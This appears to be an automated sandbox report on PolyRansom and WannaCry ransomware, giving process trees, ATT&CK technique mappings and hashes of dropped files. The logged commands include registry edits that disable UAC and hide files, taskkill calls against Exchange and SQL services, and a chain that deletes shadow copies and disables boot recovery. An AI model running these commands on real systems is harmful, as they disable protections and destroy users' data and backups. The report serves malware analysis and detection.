        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        11⤵
        Modifies visibility of file extensions in Explorer
        System Location Discovery: System Language Discovery
        Modifies registry key
        
        PID:1652
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        11⤵
        Modifies registry key
        
        PID:5764
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        11⤵
        UAC bypass
        Modifies registry key
        
        PID:5308
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\TuAQUgEk.bat" "C:\Users\Admin\Downloads\PolyRansom.exe""
        11⤵
        System Location Discovery: System Language Discovery
        
        PID:4572
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        12⤵
        
        PID:4372
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        12⤵
        
        PID:4584
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        9⤵
        Modifies visibility of file extensions in Explorer
        System Location Discovery: System Language Discovery
        Modifies registry key
        
        PID:2812
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        9⤵
        System Location Discovery: System Language Discovery
        Modifies registry key
        
        PID:5548
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        9⤵
        UAC bypass
        System Location Discovery: System Language Discovery
        Modifies registry key
        
        PID:3696
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\YgsEEMEo.bat" "C:\Users\Admin\Downloads\PolyRansom.exe""
        9⤵
        System Location Discovery: System Language Discovery
        
        PID:6076
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        10⤵
        
        PID:3572
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        7⤵
        Modifies visibility of file extensions in Explorer
        System Location Discovery: System Language Discovery
        Modifies registry key
        
        PID:5404
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        7⤵
        Modifies registry key
        
        PID:2984
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        7⤵
        UAC bypass
        Modifies registry key
        
        PID:6028
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\AacoosUY.bat" "C:\Users\Admin\Downloads\PolyRansom.exe""
        7⤵
        
        PID:2588
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        8⤵
        
        PID:5308
    - - C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        5⤵
        Modifies visibility of file extensions in Explorer
        Modifies registry key
        
        PID:3452
    - - C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        5⤵
        System Location Discovery: System Language Discovery
        Modifies registry key
        
        PID:3440
    - - C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        5⤵
        UAC bypass
        Modifies registry key
        
        PID:1756
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RcIUgkwY.bat" "C:\Users\Admin\Downloads\PolyRansom.exe""
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:1084
      - C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:5992
- - C:\Windows\SysWOW64\reg.exe
    reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
    3⤵
    - Modifies visibility of file extensions in Explorer
    - Modifies registry key
    PID:1408
- - C:\Windows\SysWOW64\reg.exe
    reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
    3⤵
    - System Location Discovery: System Language Discovery
    - Modifies registry key
    PID:552
- - C:\Windows\SysWOW64\reg.exe
    reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
    3⤵
    - UAC bypass
    - Modifies registry key
    PID:4660
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FQkccoUw.bat" "C:\Users\Admin\Downloads\PolyRansom.exe""
    3⤵
    PID:2796
  - - C:\Windows\SysWOW64\cscript.exe
      cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
      4⤵
      PID:4012
- C:\Users\Admin\Downloads\PolyRansom.exe
  "C:\Users\Admin\Downloads\PolyRansom.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious behavior: EnumeratesProcesses
  PID:2756
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Downloads\PolyRansom"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:1172
  - - C:\Users\Admin\Downloads\PolyRansom.exe
      C:\Users\Admin\Downloads\PolyRansom
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      PID:2608
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Downloads\PolyRansom"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:5856
      - C:\Users\Admin\Downloads\PolyRansom.exe
        
        C:\Users\Admin\Downloads\PolyRansom
        6⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:2180
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Downloads\PolyRansom"
        7⤵
        System Location Discovery: System Language Discovery
        
        PID:5324
        
        C:\Users\Admin\Downloads\PolyRansom.exe
        
        C:\Users\Admin\Downloads\PolyRansom
        8⤵
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        
        PID:3268
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Downloads\PolyRansom"
        9⤵
        System Location Discovery: System Language Discovery
        
        PID:5732
        
        C:\Users\Admin\Downloads\PolyRansom.exe
        
        C:\Users\Admin\Downloads\PolyRansom
        10⤵
        Executes dropped EXE
        
        PID:516
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Downloads\PolyRansom"
        11⤵
        
        PID:1928
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        12⤵
        
        PID:3452
        
        C:\Users\Admin\Downloads\PolyRansom.exe
        
        C:\Users\Admin\Downloads\PolyRansom
        12⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:5464
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Downloads\PolyRansom"
        13⤵
        System Location Discovery: System Language Discovery
        
        PID:4660
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        13⤵
        Modifies visibility of file extensions in Explorer
        System Location Discovery: System Language Discovery
        Modifies registry key
        
        PID:5568
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        13⤵
        Modifies registry key
        
        PID:6084
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        14⤵
        
        PID:1776
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        13⤵
        UAC bypass
        Modifies registry key
        
        PID:5700
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\fiscwMUA.bat" "C:\Users\Admin\Downloads\PolyRansom.exe""
        13⤵
        
        PID:5208
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        14⤵
        
        PID:3592
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        14⤵
        System Location Discovery: System Language Discovery
        
        PID:908
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        11⤵
        Modifies visibility of file extensions in Explorer
        Modifies registry key
        
        PID:5712
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        11⤵
        System Location Discovery: System Language Discovery
        Modifies registry key
        
        PID:3200
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        11⤵
        UAC bypass
        Modifies registry key
        
        PID:5532
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        12⤵
        
        PID:1756
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\nUYEoAYE.bat" "C:\Users\Admin\Downloads\PolyRansom.exe""
        11⤵
        System Location Discovery: System Language Discovery
        
        PID:3552
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        12⤵
        
        PID:4580
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        9⤵
        Modifies visibility of file extensions in Explorer
        Modifies registry key
        
        PID:116
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        10⤵
        
        PID:748
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        9⤵
        Modifies registry key
        
        PID:3528
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        9⤵
        UAC bypass
        System Location Discovery: System Language Discovery
        Modifies registry key
        
        PID:2628
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\YmscQkYw.bat" "C:\Users\Admin\Downloads\PolyRansom.exe""
        9⤵
        
        PID:2692
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        10⤵
        
        PID:5700
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        7⤵
        Modifies visibility of file extensions in Explorer
        System Location Discovery: System Language Discovery
        Modifies registry key
        
        PID:5716
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        7⤵
        System Location Discovery: System Language Discovery
        Modifies registry key
        
        PID:3552
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        7⤵
        UAC bypass
        Modifies registry key
        
        PID:3592
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\sGsUQAIg.bat" "C:\Users\Admin\Downloads\PolyRansom.exe""
        7⤵
        System Location Discovery: System Language Discovery
        
        PID:5820
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:1776
    - - C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        5⤵
        Modifies visibility of file extensions in Explorer
        System Location Discovery: System Language Discovery
        Modifies registry key
        
        PID:4372
    - - C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        5⤵
        System Location Discovery: System Language Discovery
        Modifies registry key
        
        PID:5880
    - - C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        5⤵
        UAC bypass
        Modifies registry key
        
        PID:1628
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\KugYMYks.bat" "C:\Users\Admin\Downloads\PolyRansom.exe""
        5⤵
        
        PID:1168
      - C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        6⤵
        
        PID:5720
- - C:\Windows\SysWOW64\reg.exe
    reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
    3⤵
    - Modifies visibility of file extensions in Explorer
    - Modifies registry key
    PID:3832
- - C:\Windows\SysWOW64\reg.exe
    reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
    3⤵
    - System Location Discovery: System Language Discovery
    - Modifies registry key
    PID:1188
- - C:\Windows\SysWOW64\reg.exe
    reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
    3⤵
    - UAC bypass
    - System Location Discovery: System Language Discovery
    - Modifies registry key
    PID:3488
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\zEAQQIgU.bat" "C:\Users\Admin\Downloads\PolyRansom.exe""
    3⤵
    PID:2320
  - - C:\Windows\SysWOW64\cscript.exe
      cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
      4⤵
      System Location Discovery: System Language Discovery
      PID:5756
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,7890392057743181100,1333568804808926543,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=44 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4712 /prefetch:1
  2⤵
  PID:4584
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=2104,7890392057743181100,1333568804808926543,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6164 /prefetch:8
  2⤵
  PID:1188
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2104,7890392057743181100,1333568804808926543,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6900 /prefetch:8
  2⤵
  PID:1976
- C:\Users\Admin\Downloads\WannaCry.exe
  "C:\Users\Admin\Downloads\WannaCry.exe"
  2⤵
  - Drops startup file
  - Executes dropped EXE
  - Adds Run key to start application
  - System Location Discovery: System Language Discovery
  PID:3172
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 120221723596315.bat
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2588
  - - C:\Windows\SysWOW64\cscript.exe
      cscript //nologo c.vbs
      4⤵
      System Location Discovery: System Language Discovery
      PID:5508
- - C:\Users\Admin\Downloads\!WannaDecryptor!.exe
    !WannaDecryptor!.exe f
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetWindowsHookEx
    PID:5764
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im MSExchange*
    3⤵
    - System Location Discovery: System Language Discovery
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:5340
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im Microsoft.Exchange.*
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:3856
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im sqlserver.exe
    3⤵
    - System Location Discovery: System Language Discovery
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:6128
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im sqlwriter.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:4620
- - C:\Users\Admin\Downloads\!WannaDecryptor!.exe
    !WannaDecryptor!.exe c
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious use of SetWindowsHookEx
    PID:5152
- - C:\Windows\SysWOW64\cmd.exe
    cmd.exe /c start /b !WannaDecryptor!.exe v
    3⤵
    - System Location Discovery: System Language Discovery
    PID:5632
  - - C:\Users\Admin\Downloads\!WannaDecryptor!.exe
      !WannaDecryptor!.exe v
      4⤵
      Executes dropped EXE
      Suspicious use of SetWindowsHookEx
      PID:5456
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet
        5⤵
        
        PID:3744
      - C:\Windows\SysWOW64\Wbem\WMIC.exe
        
        wmic shadowcopy delete
        6⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:5568
- - C:\Users\Admin\Downloads\!WannaDecryptor!.exe
    !WannaDecryptor!.exe
    3⤵
    - Executes dropped EXE
    - Sets desktop wallpaper using registry
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: GetForegroundWindowSpam
    - Suspicious use of SetWindowsHookEx
    PID:5788
- C:\Users\Admin\Downloads\WannaCry.exe
  "C:\Users\Admin\Downloads\WannaCry.exe"
  2⤵
  - Executes dropped EXE
  PID:5708
- C:\Users\Admin\Downloads\WannaCry.exe
  "C:\Users\Admin\Downloads\WannaCry.exe"
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:5724
- C:\Users\Admin\Downloads\WannaCry.exe
  "C:\Users\Admin\Downloads\WannaCry.exe"
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:5932

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:4204

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:5052

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:6076

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Windows Management Instrumentation

T1047

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Impair Defenses

T1562

Disable or Modify Tools

T1562.001

Indicator Removal

T1070

File Deletion

T1070.004

Modify Registry

T1112

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Browser Information Discovery

T1217

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Defacement

T1491

Inhibit System Recovery

T1490

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\vQQoAgkY\XCUkkEIA.exe

Filesize
180KB

MD5
6469ea0f71d990a5f82ece5ddd78eb8b

SHA1
6cef79c0d6c5e497a444abf513611052dab12740

SHA256
c006fcb789aac01353d6a02f70ae5349d3f4a774b22b27d8c047f9724ad9c0d6

SHA512
6355367c53288a2efb094861b6ee8fcfef94c440825f581e3d9a117c43cd9ca78776d808a0cebc55c8bb87955c8f59b0022e6d3a824942cb28a09403d9b6260c

Download Submit
C:\Recovery\WindowsRE\!WannaDecryptor!.exe.lnk

Filesize
590B

MD5
1b77b02d6c7db117c0fdf0159df79142

SHA1
2b742d456afb902b078e6f33e1be442fe1fe32ea

SHA256
07ee9e0478b663db260bc81cf7f6759770585d49aad547da474a63edf4ac7394

SHA512
d3930d43b4f1405049f0210041683c75cfb73f87852c00cff0888916b9c364c94d7a0e56cfef1646b95b4d9757524f01bef9779d5a179e6a92a54f6c8db4d201

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
0446fcdd21b016db1f468971fb82a488

SHA1
726b91562bb75f80981f381e3c69d7d832c87c9d

SHA256
62c5dc18b25e758f3508582a7c58bb46b734a774d97fc0e8a20614235caa8222

SHA512
1df7c085042266959f1fe0aedc5f6d40ceba485b54159f51f0c38f17bb250b79ea941b735e1b6faf219f23fe8ab65ac4557f545519d52d5416b89ad0f9047a31

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
9b008261dda31857d68792b46af6dd6d

SHA1
e82dc88e2d1da2df7cb19d79a0346b9bb90d52b3

SHA256
9ac598d4f8170f7e475d84103aead9e3c23d5f2d292741a7f56a17bde8b6f7da

SHA512
78853091403a06beeec4998e2e3a4342111895ffd485f7f7cd367741a4883f7a25864cba00a6c86f27dc0c9ce9d04f08011ecc40c8ae9383d33274739ac39f10

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000002

Filesize
64KB

MD5
d6b36c7d4b06f140f860ddc91a4c659c

SHA1
ccf16571637b8d3e4c9423688c5bd06167bfb9e9

SHA256
34013d7f3f0186a612bef84f2984e2767b32c9e1940df54b01d5bd6789f59e92

SHA512
2a9dd9352298ec7d1b439033b57ee9a390c373eeb8502f7f36d6826e6dd3e447b8ffd4be4f275d51481ef9a6ac2c2d97ef98f3f9d36a5a971275bf6cee48e487

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000003

Filesize
67KB

MD5
a074f116c725add93a8a828fbdbbd56c

SHA1
88ca00a085140baeae0fd3072635afe3f841d88f

SHA256
4cdcda7d8363be5bc824064259780779e7c046d56399c8a191106f55ce2ed8a6

SHA512
43ed55cda35bde93fc93c408908ab126e512c45611a994d7f4e5c85d4f2d90d573066082cb7b8dffce6a24a1f96cd534586646719b214ac7874132163faa5f28

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000004

Filesize
41KB

MD5
c79d8ef4fd2431bf9ce5fdee0b7a44bf

SHA1
ac642399b6b3bf30fe09c17e55ecbbb5774029ff

SHA256
535e28032abf1bac763bffd0ba968561265026803eb688d3cb0550ad9af1a0e8

SHA512
6b35d8b0d3e7f1821bfaeae337364ed8186085fa50ee2b368d205489a004cb46879efb2c400caf24ba6856625fe7ee1a71c72d2598c18044813ecde431054fb5

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000005

Filesize
19KB

MD5
2e86a72f4e82614cd4842950d2e0a716

SHA1
d7b4ee0c9af735d098bff474632fc2c0113e0b9c

SHA256
c1334e604dbbffdf38e9e2f359938569afe25f7150d1c39c293469c1ee4f7b6f

SHA512
7a5fd3e3e89c5f8afca33b2d02e5440934e5186b9fa6367436e8d20ad42b211579225e73e3a685e5e763fa3f907fc4632b9425e8bd6d6f07c5c986b6556d47b1

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000006

Filesize
65KB

MD5
56d57bc655526551f217536f19195495

SHA1
28b430886d1220855a805d78dc5d6414aeee6995

SHA256
f12de7e272171cda36389813df4ba68eb2b8b23c58e515391614284e7b03c4d4

SHA512
7814c60dc377e400bbbcc2000e48b617e577a21045a0f5c79af163faa0087c6203d9f667e531bbb049c9bd8fb296678e6a5cdcad149498d7f22ffa11236b51cb

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000007

Filesize
88KB

MD5
b38fbbd0b5c8e8b4452b33d6f85df7dc

SHA1
386ba241790252df01a6a028b3238de2f995a559

SHA256
b18b9eb934a5b3b81b16c66ec3ec8e8fecdb3d43550ce050eb2523aabc08b9cd

SHA512
546ca9fb302bf28e3a178e798dd6b80c91cba71d0467257b8ed42e4f845aa6ecb858f718aac1e0865b791d4ecf41f1239081847c75c6fb3e9afd242d3704ad16

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000009

Filesize
1.2MB

MD5
9f8f80ca4d9435d66dd761fbb0753642

SHA1
5f187d02303fd9044b9e7c74e0c02fe8e6a646b7

SHA256
ab481b8b19b3336deda1b9ad4680cce4958152c9f9daa60c7bd8eb6786887359

SHA512
9c0de8e5bf16f096bf781189d813eeb52c3c8ec73fc791de10a8781e9942de06ed30ff5021ab7385c98686330049e3e610adc3e484e12ef807eec58607cfae63

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000013

Filesize
21KB

MD5
7715176f600ed5d40eaa0ca90f7c5cd7

SHA1
00fdb1d5b1421ea03d2d33542a4eaf7ac543d3d0

SHA256
154632629a0698587e95c608e6ed5f232e2ba1a33d7c07fea862a25293a9926e

SHA512
799cfee1969b6137813c98b83b90052c04527b273156f577841b64828c07c4e6a3913a6ddd49ae5021ed54a367ddbc5ab2193226960b0ffe9a618c663c8d8a1c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000014

Filesize
37KB

MD5
93acf02790e375a1148c9490557b3a1d

SHA1
78a367c8a8b672dd66a19eb823631e8990f78b48

SHA256
4f2513f353c2cdd3177e3890f216ea666e4eb99477a56a97ff490f69a9833423

SHA512
e6354f4e4d35e9b936a7ddaebdd6527c37e6248c3f2d450c428903a32d77439cab78020a45834379cf814a79149c3dddf4e1280b9d06a7f972e5f8e61c463d6e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000015

Filesize
37KB

MD5
a2ade5db01e80467e87b512193e46838

SHA1
40b35ee60d5d0388a097f53a1d39261e4e94616d

SHA256
154a7cfc19fb8827601d1f8eda3788b74e2018c96779884b13da73f6b1853a15

SHA512
1c728558e68ed5c0a7d19d8f264ad3e3c83b173b3e3cd5f53f5f3b216ed243a16944dbe6b2159cfe40ee4a3813ca95a834f162073a296b72bbdedc15546be8f8

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00001e

Filesize
23KB

MD5
bc715e42e60059c3ea36cd32bfb6ebc9

SHA1
b8961b23c29b9769100116ba0da44f13a24a3dd4

SHA256
110ccd760150c6ac29c987ee2b8f7c56772036f6fe74ff2fb56c094849912745

SHA512
5c0edd336a6d892f0163aa183e5482313dd86f9f5b2d624b3c4529692d70720f4823808f10ee7870fd9368b24de752b343570419fd244c33ad2d9cc86007bedc

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
4KB

MD5
a6cdfc26596fd01539036a023cdda1cc

SHA1
dac56f0407a9179b70765f0d0c2db0e871536e0f

SHA256
